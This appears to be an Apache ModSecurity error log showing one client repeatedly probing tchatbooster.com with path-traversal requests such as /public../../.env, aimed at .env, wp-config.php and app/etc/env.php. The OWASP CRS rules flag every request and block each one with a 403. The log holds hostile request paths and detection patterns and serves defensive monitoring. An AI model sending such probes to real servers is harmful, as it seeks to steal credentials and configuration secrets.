[Tue May 12 04:40:38.897631 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTJs1tk6y7yBJLpJoqMwAAAI8"]
[Tue May 12 04:40:38.897704 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTJs1tk6y7yBJLpJoqMwAAAI8"]
[Tue May 12 04:40:38.897870 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTJs1tk6y7yBJLpJoqMwAAAI8"]
[Tue May 12 04:40:39.343141 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTJs1tk6y7yBJLpJoqMwAAAI8"]
[Tue May 12 04:40:39.360371 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTJ9r1yOh9TvizeziQSgAAAFY"], referer: https://tchatbooster.com/public../../.env
[Tue May 12 04:40:39.360588 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTJ9r1yOh9TvizeziQSgAAAFY"], referer: https://tchatbooster.com/public../../.env
[Tue May 12 04:40:39.810067 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTJ9r1yOh9TvizeziQSgAAAFY"], referer: https://tchatbooster.com/public../../.env
[Tue May 12 04:40:39.840486 2026] [core:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] AH10244: invalid URI path (/public../../../.env)
[Tue May 12 04:40:40.293074 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTKNr1yOh9TvizeziQSwAAAFY"], referer: https://tchatbooster.com/public../../../.env
[Tue May 12 04:40:40.293281 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTKNr1yOh9TvizeziQSwAAAFY"], referer: https://tchatbooster.com/public../../../.env
[Tue May 12 04:40:40.757475 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTKNr1yOh9TvizeziQSwAAAFY"], referer: https://tchatbooster.com/public../../../.env
[Tue May 12 04:40:40.856842 2026] [core:error] [pid 1825179:tid 1825217] [client 45.148.10.166:38002] AH10244: invalid URI path (/public../../../../.env)
[Tue May 12 04:40:41.299921 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTKdr1yOh9TvizeziQTQAAAFY"], referer: https://tchatbooster.com/public../../../../.env
[Tue May 12 04:40:41.300150 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTKdr1yOh9TvizeziQTQAAAFY"], referer: https://tchatbooster.com/public../../../../.env
[Tue May 12 04:40:41.771699 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTKdr1yOh9TvizeziQTQAAAFY"], referer: https://tchatbooster.com/public../../../../.env
[Tue May 12 04:40:41.927918 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTKc1tk6y7yBJLpJoqNgAAAJQ"]
[Tue May 12 04:40:41.928007 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTKc1tk6y7yBJLpJoqNgAAAJQ"]
[Tue May 12 04:40:41.928181 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTKc1tk6y7yBJLpJoqNgAAAJQ"]
[Tue May 12 04:40:42.384629 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTKc1tk6y7yBJLpJoqNgAAAJQ"]
[Tue May 12 04:40:42.404043 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTKtr1yOh9TvizeziQUQAAAFY"], referer: https://tchatbooster.com/public../../.env.local
[Tue May 12 04:40:42.404270 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTKtr1yOh9TvizeziQUQAAAFY"], referer: https://tchatbooster.com/public../../.env.local
[Tue May 12 04:40:42.872646 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTKtr1yOh9TvizeziQUQAAAFY"], referer: https://tchatbooster.com/public../../.env.local
[Tue May 12 04:40:42.903147 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTKs1tk6y7yBJLpJoqOwAAAJQ"]
[Tue May 12 04:40:42.903229 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTKs1tk6y7yBJLpJoqOwAAAJQ"]
[Tue May 12 04:40:42.903405 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTKs1tk6y7yBJLpJoqOwAAAJQ"]
[Tue May 12 04:40:43.351776 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTKs1tk6y7yBJLpJoqOwAAAJQ"]
[Tue May 12 04:40:43.372665 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTK9r1yOh9TvizeziQWAAAAFY"], referer: https://tchatbooster.com/public../../.env.production
[Tue May 12 04:40:43.372913 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTK9r1yOh9TvizeziQWAAAAFY"], referer: https://tchatbooster.com/public../../.env.production
[Tue May 12 04:40:43.865652 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTK9r1yOh9TvizeziQWAAAAFY"], referer: https://tchatbooster.com/public../../.env.production
[Tue May 12 04:40:43.893872 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTK81tk6y7yBJLpJoqQQAAAJQ"]
[Tue May 12 04:40:43.893970 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTK81tk6y7yBJLpJoqQQAAAJQ"]
[Tue May 12 04:40:43.894147 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTK81tk6y7yBJLpJoqQQAAAJQ"]
[Tue May 12 04:40:44.338161 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTK81tk6y7yBJLpJoqQQAAAJQ"]
[Tue May 12 04:40:44.358761 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTLNr1yOh9TvizeziQWQAAAFY"], referer: https://tchatbooster.com/public../../wp-config.php
[Tue May 12 04:40:44.359005 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTLNr1yOh9TvizeziQWQAAAFY"], referer: https://tchatbooster.com/public../../wp-config.php
[Tue May 12 04:40:44.816022 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTLNr1yOh9TvizeziQWQAAAFY"], referer: https://tchatbooster.com/public../../wp-config.php
[Tue May 12 04:40:44.849078 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKTLM1tk6y7yBJLpJoqQgAAAJQ"]
